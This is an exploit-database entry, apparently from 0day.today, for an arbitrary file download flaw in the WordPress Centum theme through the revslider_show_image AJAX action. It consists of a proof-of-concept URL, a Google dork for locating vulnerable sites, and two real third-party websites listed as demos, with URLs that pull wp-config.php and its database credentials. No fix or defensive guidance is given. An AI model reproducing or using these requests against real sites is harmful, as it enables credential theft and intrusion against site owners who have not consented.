WordPress Theme Centum Arbitrary File Download Vulnerability

2014-09-18T00:00:00
ID 1337DAY-ID-22662
Type zdt
Reporter gujjar(pcp)
Modified 2014-09-18T00:00:00

Description

WordPress Theme Centum effected with Arbitrary File Download Vulnerability

                                        
                                            POC http://127.0.0.1/wp-admin/admin-ajax.php?action=revslider_show_image&img=[LFD]
Google Dork :inurl:wp-content/themes/centum
Demo sites
http://cecopgroup.com/sp/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

http://www.tourmasters.co.nz/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

#  0day.today [2018-04-14]  #